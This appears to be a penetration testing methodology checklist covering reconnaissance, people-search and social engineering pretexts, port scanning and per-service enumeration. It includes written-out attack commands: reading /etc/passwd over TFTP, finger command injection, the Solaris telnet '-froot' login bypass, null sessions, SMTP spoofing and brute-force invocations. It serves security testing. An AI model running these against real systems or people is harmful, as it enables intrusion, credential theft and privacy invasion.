Penetration Testing Framework 0.58

1. Pre-Inspection Visit - template

2. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms, i.e. active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and the other forms of protection afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser, visiting newsgroups, etc. An active form would be more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

2.1. Untitled

2.1.1. Authoritative Bodies

2.1.1.1. IANA - Internet Assigned Numbers Authority

2.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

2.1.1.3. NRO - Number Resource Organisation

2.1.1.4. RIR - Regional Internet Registry

2.1.1.4.1. AFRINIC - African Network Information Centre

2.1.1.4.2. APNIC - Asia Pacific Network Information Centre

2.1.1.4.3. ARIN - American Registry for Internet Numbers

2.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

2.1.1.4.5. RIPE - Réseaux IP Européens Network Coordination Centre

2.1.2. Websites

2.1.2.1. Central Ops

2.1.2.1.1. Domain Dossier

2.1.2.1.2. Email Dossier

2.1.2.2. DNS Stuff

2.1.2.2.1. Online DNS one-stop shop, able to perform a wide range of different DNS queries.

2.1.2.3. Fixed Orbit

2.1.2.3.1. Autonomous System lookups and other online tools available.

2.1.2.4. Geektools

2.1.2.5. IP2Location

2.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

2.1.2.6. Kartoo

2.1.2.6.1. Metasearch engine that visually presents its results.

2.1.2.7. MyIPNeighbors.com

2.1.2.7.1. Excellent site that gives details of the domains sharing the IP queried and, conversely, resolves an IP to its DNS names.

2.1.2.8. My-IP-Neighbors.com

2.1.2.8.1. Excellent site that can be used if the above is down

2.1.2.9. myipneighbors.net

2.1.2.10. Netcraft

2.1.2.10.1. Online search tool allowing queries for host information.

2.1.2.11. Passive DNS Replication

2.1.2.11.1. Finds shared domains based on supplied IP addresses

2.1.2.11.2. Note: website utilised by the nmap hostmap.nse script

2.1.2.12. Robtex

2.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed, with a graphical display of the results showing PTR, A and MX records and AS connectivity.

2.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify)

2.1.2.13. Traceroute.org

2.1.2.13.1. Website listing a large number of links to online traceroute resources.

2.1.2.14. Wayback Machine

2.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

2.1.2.15. Whois.net

2.1.3. Tools

2.1.3.1. Cheops-ng

2.1.3.2. Country whois

2.1.3.3. Domain Research Tool

2.1.3.4. Firefox Plugins

2.1.3.4.1. AS Number

2.1.3.4.2. Shazou

2.1.3.4.3. Firecat Suite

2.1.3.5. Gnetutil

2.1.3.6. Goolag Scanner

2.1.3.7. Greenwich

2.1.3.8. Maltego

2.1.3.9. GTWhois

2.1.3.10. Sam Spade

2.1.3.11. Smart whois

2.1.3.12. SpiderFoot

2.2. Internet Search

2.2.1. General Information

2.2.1.1. Web Investigator

2.2.1.2. Tracesmart

2.2.1.3. Friends Reunited

2.2.1.4. Ebay - profiles etc.

2.2.2. Financial

2.2.2.1. EDGAR - Company information, including real-time filings. US

2.2.2.2. Google Finance - General Finance Portal

2.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

2.2.2.4. Companies House UK

2.2.2.5. Land Registry UK

2.2.3. Phone Book/ Electoral Roll Information

2.2.3.1. 123people

2.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

2.2.3.2. 192.com

2.2.3.2.1. Electoral Roll Search. UK

2.2.3.3. 411

2.2.3.3.1. Online White Pages and Yellow Pages. US

2.2.3.4. Untitled

2.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

2.2.3.5. BT.com. UK

2.2.3.5.1. Residential

2.2.3.5.2. Business

2.2.3.6. Pipl

2.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

2.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

2.2.3.7. Spokeo

2.2.3.7.1. http://www.spokeo.com/user?q=domain_name

2.2.3.7.2. http://www.spokeo.com/user?q=email_address

2.2.3.8. Yasni

2.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

2.2.3.9. Zabasearch

2.2.3.9.1. People Search Engine. US

2.2.4. Generic Web Searching

2.2.4.1. Code Search

2.2.4.2. Forum Entries

2.2.4.3. Google Hacking Database

2.2.4.4. Google

2.2.4.4.1. Back end files

2.2.4.4.2. Email Addresses

2.2.4.4.3. Contact Details

2.2.4.5. Newsgroups/forums

2.2.4.6. Blog Search

2.2.4.6.1. Yammer

2.2.4.6.2. Google Blog Search

2.2.4.6.3. Technorati

2.2.4.6.4. Jaiku

2.2.4.6.5. Present.ly

2.2.4.6.6. Twitter Network Browser

2.2.4.7. Search Engine Comparison/ Aggregator Sites

2.2.4.7.1. Clusty

2.2.4.7.2. Grokker

2.2.4.7.3. Zuula

2.2.4.7.4. Exalead

2.2.4.7.5. Delicious

2.2.5. Metadata Search

2.2.5.1. Untitled

2.2.5.1.1. MetaData Visualisation Sites

2.2.5.1.2. Tools

2.2.5.1.3. Wikipedia Metadata Search

2.2.6. Social/ Business Networks

2.2.6.1. Untitled

2.2.6.1.1. Africa

2.2.6.1.2. Australia

2.2.6.1.3. Belgium

2.2.6.1.4. Holland

2.2.6.1.5. Hungary

2.2.6.1.6. Iran

2.2.6.1.7. Japan

2.2.6.1.8. Korea

2.2.6.1.9. Poland

2.2.6.1.10. Russia

2.2.6.1.11. Sweden

2.2.6.1.12. UK

2.2.6.1.13. US

2.2.6.1.14. Assorted

2.2.7. Resources

2.2.7.1. OSINT

2.2.7.2. International Directory of Search Engines

2.3. DNS Record Retrieval from publicly available servers

2.3.1. Types of Information Records

2.3.1.1. SOA Records - Indicates the server that has authority for the domain.

2.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

2.3.1.3. NS Records - List of a host’s or domain’s name server(s).

2.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

2.3.1.5. PTR Records - Maps an IP address back to a host's domain name (reverse lookup).

2.3.1.6. SRV Records - Service location record.

2.3.1.7. HINFO Records - Host information record with CPU type and operating system.

2.3.1.8. TXT Records - Generic text record.

2.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

2.3.1.10. RP - Responsible person for the domain.

2.3.2. Database Settings

2.3.2.1. Version.bind

2.3.2.2. Serial

2.3.2.3. Refresh

2.3.2.4. Retry

2.3.2.5. Expiry

2.3.2.6. Minimum

2.3.3. Sub Domains

2.3.4. Internal IP ranges

2.3.4.1. Reverse DNS for IP Range

2.3.5. Zone Transfer

2.4. Social Engineering

2.4.1. Remote

2.4.1.1. Phone

2.4.1.1.1. Scenarios

2.4.1.1.2. Results

2.4.1.1.3. Contact Details

2.4.1.2. Email

2.4.1.2.1. Scenarios

2.4.1.2.2. Software

2.4.1.2.3. Results

2.4.1.2.4. Contact Details

2.4.1.3. Other

2.4.2. Local

2.4.2.1. Personas

2.4.2.1.1. Name

2.4.2.1.2. Phone

2.4.2.1.3. Email

2.4.2.1.4. Business Cards

2.4.2.2. Contact Details

2.4.2.2.1. Name

2.4.2.2.2. Phone number

2.4.2.2.3. Email

2.4.2.2.4. Room number

2.4.2.2.5. Department

2.4.2.2.6. Role

2.4.2.3. Scenarios

2.4.2.3.1. New IT employee

2.4.2.3.2. Fire Inspector

2.4.2.4. Results

2.4.2.5. Maps

2.4.2.5.1. Satellite Imagery

2.4.2.5.2. Building layouts

2.4.2.6. Other

2.5. Dumpster Diving

2.5.1. Rubbish Bins

2.5.2. Contract Waste Removal

2.5.3. eBay ex-stock sales, e.g. HDDs

2.6. Web Site copy

2.6.1. httrack

2.6.2. teleport pro

2.6.3. Black Widow

3. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system being utilised on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and then waits for a reply (or lack thereof). Disparate OSs respond differently to certain types of packet (the response is governed by an RFC and by any proprietary responses the vendor, notably Microsoft, has enabled within the system), and so custom packets may be sent. Remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

3.1. Default Port Lists

3.1.1. Windows

3.1.2. *nix

3.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets to be used. Default passwords are platform and vendor specific.

3.2.1. General Enumeration Tools

3.2.1.1. nmap

3.2.1.1.1. nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

3.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

3.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

3.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

3.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

3.2.1.2. netcat

3.2.1.2.1. nc -v -n IP_Address port

3.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

3.2.1.3. amap

3.2.1.3.1. amap -bqv 192.168.1.1 80

3.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

3.2.1.4. xprobe2

3.2.1.4.1. xprobe2 192.168.1.1

3.2.1.5. sinfp

3.2.1.5.1. ./sinfp.pl -i -p

3.2.1.6. nbtscan

3.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

3.2.1.7. hping

3.2.1.7.1. hping ip_address

3.2.1.8. scanrand

3.2.1.8.1. scanrand ip_address:all

3.2.1.9. unicornscan

3.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

3.2.1.10. netenum

3.2.1.10.1. netenum network/netmask timeout

3.2.1.11. fping

3.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

3.2.2. Firewall Specific Tools

3.2.2.1. firewalk

3.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

3.2.2.2. ftester

3.2.2.2.1. On host 1: ./ftestd -i eth0 -v; on host 2: ./ftest -f ftest.conf -v -d 0.01; then: ./freport ftest.log ftestd.log

3.2.3. Default Passwords (Examine list)

3.2.3.1. Passwords A

3.2.3.2. Passwords B

3.2.3.3. Passwords C

3.2.3.4. Passwords D

3.2.3.5. Passwords E

3.2.3.6. Passwords F

3.2.3.7. Passwords G

3.2.3.8. Passwords H

3.2.3.9. Passwords I

3.2.3.10. Passwords J

3.2.3.11. Passwords K

3.2.3.12. Passwords L

3.2.3.13. Passwords M

3.2.3.14. Passwords N

3.2.3.15. Passwords O

3.2.3.16. Passwords P

3.2.3.17. Passwords R

3.2.3.18. Passwords S

3.2.3.19. Passwords T

3.2.3.20. Passwords U

3.2.3.21. Passwords V

3.2.3.22. Passwords W

3.2.3.23. Passwords X

3.2.3.24. Passwords Y

3.2.3.25. Passwords Z

3.2.3.26. Passwords (Numeric)

3.3. Active Hosts

3.3.1. Open TCP Ports

3.3.2. Closed TCP Ports

3.3.3. Open UDP Ports

3.3.4. Closed UDP Ports

3.3.5. Service Probing

3.3.5.1. SMTP Mail Bouncing

3.3.5.2. Banner Grabbing

3.3.5.2.1. Other

3.3.5.2.2. HTTP

3.3.5.2.3. HTTPS

3.3.5.2.4. SMTP

3.3.5.2.5. POP3

3.3.5.2.6. FTP

3.3.6. ICMP Responses

3.3.6.1. Type 3 (Port Unreachable)

3.3.6.2. Type 8 (Echo Request)

3.3.6.3. Type 13 (Timestamp Request)

3.3.6.4. Type 15 (Information Request)

3.3.6.5. Type 17 (Subnet Address Mask Request)

3.3.6.6. Responses from broadcast address

3.3.7. Source Port Scans

3.3.7.1. TCP/UDP 53 (DNS)

3.3.7.2. TCP 20 (FTP Data)

3.3.7.3. TCP 80 (HTTP)

3.3.7.4. TCP/UDP 88 (Kerberos)

3.3.8. Firewall Assessment

3.3.8.1. Firewalk

3.3.8.2. TCP/UDP/ICMP responses

3.3.9. OS Fingerprint

4. Enumeration

4.1. Daytime port 13 open

4.1.1. nmap nse script

4.1.1.1. daytime

4.2. FTP port 21 open

4.2.1. Fingerprint server

4.2.1.1. telnet ip_address 21 (Banner grab)

4.2.1.2. Run command ftp ip_address

4.2.1.3. [email protected]

4.2.1.4. Check for anonymous access

4.2.1.4.1. ftp ip_address, then Username: anonymous OR anon, Password: [email protected]

4.2.2. Password guessing

4.2.2.1. Hydra brute force

4.2.2.2. medusa

4.2.2.3. Brutus

4.2.3. Examine configuration files

4.2.3.1. ftpusers

4.2.3.2. ftp.conf

4.2.3.3. proftpd.conf

4.2.4. MiTM

4.2.4.1. pasvagg.pl

4.3. SSH port 22 open

4.3.1. Fingerprint server

4.3.1.1. telnet ip_address 22 (banner grab)

4.3.1.2. scanssh

4.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

4.3.2. Password guessing

4.3.2.1. ssh username@ip_address

4.3.2.2. guess-who

4.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

4.3.2.3. Hydra brute force

4.3.2.4. brutessh

4.3.2.5. Ruby SSH Bruteforcer

4.3.3. Examine configuration files

4.3.3.1. ssh_config

4.3.3.2. sshd_config

4.3.3.3. authorized_keys

4.3.3.4. ssh_known_hosts

4.3.3.5. .shosts

4.3.4. SSH Client programs

4.3.4.1. tunnelier

4.3.4.2. winsshd

4.3.4.3. putty

4.3.4.4. winscp

4.4. Telnet port 23 open

4.4.1. Fingerprint server

4.4.1.1. telnet ip_address

4.4.1.1.1. Common Banner List (OS / Banner)

4.4.1.1.1.1. Solaris 8 / SunOS 5.8

4.4.1.1.1.2. Solaris 2.6 / SunOS 5.6

4.4.1.1.1.3. Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)

4.4.1.1.1.4. SunOS 4.1.x / SunOS Unix (hostname)

4.4.1.1.1.5. FreeBSD / FreeBSD/i386 (hostname) (ttyp1)

4.4.1.1.1.6. NetBSD / NetBSD/i386 (hostname) (ttyp1)

4.4.1.1.1.7. OpenBSD / OpenBSD/i386 (hostname) (ttyp1)

4.4.1.1.1.8. Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)

4.4.1.1.1.9. Debian 3.0 / Debian GNU/Linux 3.0 / hostname

4.4.1.1.1.10. SGI IRIX 6.x / IRIX (hostname)

4.4.1.1.1.11. IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

4.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

4.4.1.1.1.13. Nokia IPSO / IPSO (hostname) (ttyp0)

4.4.1.1.1.14. Cisco IOS / User Access Verification

4.4.1.1.1.15. Livingston ComOS / ComOS - Livingston PortMaster

4.4.1.2. telnetfp

4.4.2. Password Attack

4.4.2.2. Hydra brute force

4.4.2.3. Brutus

4.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

4.4.3. Examine configuration files

4.4.3.1. /etc/inetd.conf

4.4.3.2. /etc/xinetd.d/telnet

4.4.3.3. /etc/xinetd.d/stelnet

4.5. Sendmail Port 25 open

4.5.1. Fingerprint server

4.5.1.1. telnet ip_address 25 (banner grab)

4.5.2. Mail Server Testing

4.5.2.1. Enumerate users

4.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

4.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

4.5.2.2. Mail Spoof Test

4.5.2.2.1. SMTP session sequence

4.5.2.2.1.1. HELO anything

4.5.2.2.1.2. MAIL FROM: spoofed_address

4.5.2.2.1.3. RCPT TO: valid_mail_account

4.5.2.2.1.4. DATA

4.5.2.2.1.5. . (a single dot on a line of its own ends the message)

4.5.2.2.1.6. QUIT

4.5.2.3. Mail Relay Test

4.5.3. Examine Configuration Files

4.5.3.1. sendmail.cf

4.5.3.2. submit.cf

4.6. DNS port 53 open

4.6.1. Fingerprint server/ service

4.6.1.1. host

4.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]

4.6.1.1.2. Options: -v verbose format; -t (query type) allows a user to specify a record type, i.e. A, NS, or PTR; -a same as -t ANY; -l zone transfer (if allowed); -f save to a specified filename.

4.6.1.2. nslookup

4.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

4.6.1.3. dig

4.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

4.6.1.4. whois: -h use the named host to resolve the query; -a use ARIN to resolve the query; -r use RIPE to resolve the query; -p use APNIC to resolve the query; -Q perform a quick lookup

4.6.2. DNS Enumeration

4.6.2.1. Bile Suite

4.6.2.1.1. perl BiLE.pl [website] [project_name]

4.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

4.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

4.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

4.6.2.1.5. perl exp-tld.pl [input file] [output file]

4.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

4.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

4.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

4.6.2.2. txdns

4.6.2.2.1. txdns -rt -t domain_name

4.6.2.2.2. txdns -x 50 -bb domain_name

4.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

4.6.2.3. nmap nse scripts

4.6.2.3.1. dns-random-srcport

4.6.2.3.2. dns-random-txid

4.6.2.3.3. dns-recursion

4.6.2.3.4. dns-zone-transfer

4.6.3. Examine Configuration Files

4.6.3.1. host.conf

4.6.3.2. resolv.conf

4.6.3.3. named.conf

4.7. TFTP port 69 open

4.7.1. TFTP Enumeration

4.7.1.1. tftp ip_address PUT local_file

4.7.1.2. tftp ip_address GET conf.txt (or other files)

4.7.1.3. Solarwinds TFTP server

4.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

4.7.2. TFTP Bruteforcing

4.7.2.1. TFTP bruteforcer

4.7.2.2. Cisco-Torch

4.8. Finger Port 79 open

4.8.1. User enumeration

4.8.1.1. finger 'a b c d e f g h' @example.com

4.8.1.2. finger [email protected]

4.8.1.3. finger [email protected]

4.8.1.4. finger [email protected]

4.8.1.5. finger [email protected]

4.8.1.6. finger **@example.com

4.8.1.7. finger [email protected]

4.8.1.8. finger @example.com

4.8.1.9. nmap nse script

4.8.1.9.1. finger

4.8.2. Command execution

4.8.2.1. finger "|/bin/[email protected]"

4.8.2.2. finger "|/bin/ls -a /@example.com"

4.8.3. Finger Bounce

4.8.3.1. finger [email protected]@victim

4.8.3.2. finger @[email protected]

4.9. Web Ports 80,8080 etc. open

4.9.1. Fingerprint server

4.9.1.1. Telnet ip_address port

4.9.1.2. Firefox plugins

4.9.1.2.1. All

4.9.1.2.2. Specific

4.9.2. Crawl website

4.9.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)

4.9.2.2. httprint

4.9.2.3. Metagoofil

4.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

4.9.3. Web Directory enumeration

4.9.3.1. Nikto

4.9.3.1.1. nikto [-h target] [options]

4.9.3.2. DirBuster

4.9.3.3. Wikto

4.9.3.4. Goolag Scanner

4.9.4. Vulnerability Assessment

4.9.4.1. Manual Tests

4.9.4.1.1. Default Passwords

4.9.4.1.2. Install Backdoors

4.9.4.1.3. Method Testing

4.9.4.1.4. Upload Files

4.9.4.1.5. View Page Source

4.9.4.1.6. Input Validation Checks

4.9.4.1.7. Automated table and column iteration

4.9.4.2. Vulnerability Scanners

4.9.4.2.1. Acunetix

4.9.4.2.2. Grendelscan

4.9.4.2.3. NStealth

4.9.4.2.4. Obiwan III

4.9.4.2.5. w3af

4.9.4.3. Specific Applications/ Server Tools

4.9.4.3.1. Domino

4.9.4.3.2. Joomla

4.9.4.3.3. aspaudit.pl

4.9.4.3.4. Vbulletin

4.9.4.3.5. ZyXel

4.9.5. Proxy Testing

4.9.5.1. Burpsuite

4.9.5.2. Crowbar

4.9.5.3. Interceptor

4.9.5.4. Paros

4.9.5.5. Requester Raw

4.9.5.6. Suru

4.9.5.7. WebScarab

4.9.6. Examine configuration files

4.9.6.1. Generic

4.9.6.1.1. Examine httpd.conf/ windows config files

4.9.6.2. JBoss

4.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/

4.9.6.3. Joomla

4.9.6.3.1. configuration.php

4.9.6.3.2. diagnostics.php

4.9.6.3.3. joomla.inc.php

4.9.6.3.4. config.inc.php

4.9.6.4. Mambo

4.9.6.4.1. configuration.php

4.9.6.4.2. config.inc.php

4.9.6.5. Wordpress

4.9.6.5.1. setup-config.php

4.9.6.5.2. wp-config.php

4.9.6.6. ZyXel

4.9.6.6.1. /WAN.html (contains PPPoE ISP password)

4.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

4.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

4.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

4.9.6.6.5. /CF_Keyword.html (Content Filter)

4.9.6.6.6. /RemMagWWW.html (Remote MGMT)

4.9.6.6.7. /rpSysAdmin.html (System)

4.9.6.6.8. /LAN_IP.html (LAN)

4.9.6.6.9. /NAT_General.html (NAT)

4.9.6.6.10. /ViewLog.html (Logs)

4.9.6.6.11. /rpFWUpload.html (Tools)

4.9.6.6.12. /DiagGeneral.html (Diagnostic)

4.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

4.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

4.9.6.6.15. Config Backups

4.9.7. Examine web server logs

4.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

4.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq

4.9.8. References

4.9.8.1. White Papers

4.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

4.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

4.9.8.1.3. Blind Security Testing - An Evolutionary Approach

4.9.8.1.4. Command Injection in XML Signatures and Encryption

4.9.8.1.5. Input Validation Cheat Sheet

4.9.8.1.6. SQL Injection Cheat Sheet

4.9.8.2. Books

4.9.8.2.1. Hacking Exposed Web 2.0

4.9.8.2.2. Hacking Exposed Web Applications

4.9.8.2.3. The Web Application Hacker's Handbook

4.9.9. Exploit Frameworks

4.9.9.1. Brute-force Tools

4.9.9.1.1. Acunetix

4.9.9.2. Metasploit

4.9.9.3. w3af

4.10. Portmapper port 111 open

4.10.1. rpcdump.py

4.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

4.10.2. rpcinfo

4.10.2.1. rpcinfo [options] IP_Address

4.11. NTP Port 123 open

4.11.1. NTP Enumeration

4.11.1.1. ntpdc -c monlist IP_ADDRESS

4.11.1.2. ntpdc -c sysinfo IP_ADDRESS

4.11.1.3. ntpq

4.11.1.3.1. host

4.11.1.3.2. hostname

4.11.1.3.3. ntpversion

4.11.1.3.4. readlist

4.11.1.3.5. version

4.11.2. Examine configuration files

4.11.2.1. ntp.conf

4.11.3. nmap nse script

4.11.3.1. ntp-info

4.12. NetBIOS Ports 135-139,445 open

4.12.1. NetBIOS enumeration

4.12.1.1. Enum

4.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

4.12.1.2. Null Session

4.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

4.12.1.3. Smbclient

4.12.1.3.1. smbclient -L //server/share password options

4.12.1.4. Superscan

4.12.1.4.1. Enumeration tab.

4.12.1.5. user2sid/sid2user

4.12.1.6. Winfo

4.12.2. NetBIOS brute force

4.12.2.1. Hydra

4.12.2.2. Brutus

4.12.2.3. Cain & Abel

4.12.2.4. getacct

4.12.2.5. NAT (NetBIOS Auditing Tool)

4.12.3. Examine Configuration Files

4.12.3.1. Smb.conf

4.12.3.2. lmhosts

4.13. SNMP port 161 open

4.13.1. Default Community Strings

4.13.1.1. public

4.13.1.2. private

4.13.1.3. cisco

4.13.1.3.1. cable-docsis

4.13.1.3.2. ILMI

4.13.2. MIB enumeration

4.13.2.1. Windows NT

4.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

4.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

4.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

4.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

4.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

4.13.2.2. Solarwinds MIB walk

4.13.2.3. Getif

4.13.2.4. snmpwalk

4.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

4.13.2.5. Snscan

4.13.2.6. Applications

4.13.2.6.1. ZyXel

4.13.2.7. nmap nse script

4.13.2.7.1. snmp-sysdescr

4.13.3. SNMP Bruteforce

4.13.3.1. onesixtyone

4.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>

4.13.3.2. cat

4.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

4.13.3.3. Solarwinds SNMP Brute Force

4.13.3.4. ADMsnmp

4.13.3.5. nmap nse script

4.13.3.5.1. snmp-brute

4.13.4. Examine SNMP Configuration files

4.13.4.1. snmp.conf

4.13.4.2. snmpd.conf

4.13.4.3. snmp-config.xml

4.14. LDAP Port 389 Open

4.14.1. ldap enumeration

4.14.1.1. ldapminer

4.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

4.14.1.2. luma

4.14.1.2.1. Gui based tool

4.14.1.3. ldp

4.14.1.3.1. Gui based tool

4.14.1.4. openldap

4.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

4.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

4.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

4.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

4.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

4.14.2. ldap brute force

4.14.2.1. bf_ldap

4.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate; optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)

4.14.2.2. K0ldS

4.14.2.3. LDAP_Brute.pl

4.14.3. Examine Configuration Files

4.14.3.1. General

4.14.3.1.1. containers.ldif

4.14.3.1.2. ldap.cfg

4.14.3.1.3. ldap.conf

4.14.3.1.4. ldap.xml

4.14.3.1.5. ldap-config.xml

4.14.3.1.6. ldap-realm.xml

4.14.3.1.7. slapd.conf

4.14.3.2. IBM SecureWay V3 server

4.14.3.2.1. V3.sas.oc

4.14.3.3. Microsoft Active Directory server

4.14.3.3.1. msadClassesAttrs.ldif

4.14.3.4. Netscape Directory Server 4

4.14.3.4.1. nsslapd.sas_at.conf

4.14.3.4.2. nsslapd.sas_oc.conf

4.14.3.5. OpenLDAP directory server

4.14.3.5.1. slapd.sas_at.conf

4.14.3.5.2. slapd.sas_oc.conf

4.14.3.6. Sun ONE Directory Server 5.1

4.14.3.6.1. 75sas.ldif

4.15. PPTP/L2TP/VPN port 500/1723 open

4.15.1. Enumeration

4.15.1.1. ike-scan

4.15.1.2. ike-probe

4.15.2. Brute-Force

4.15.2.1. ike-crack

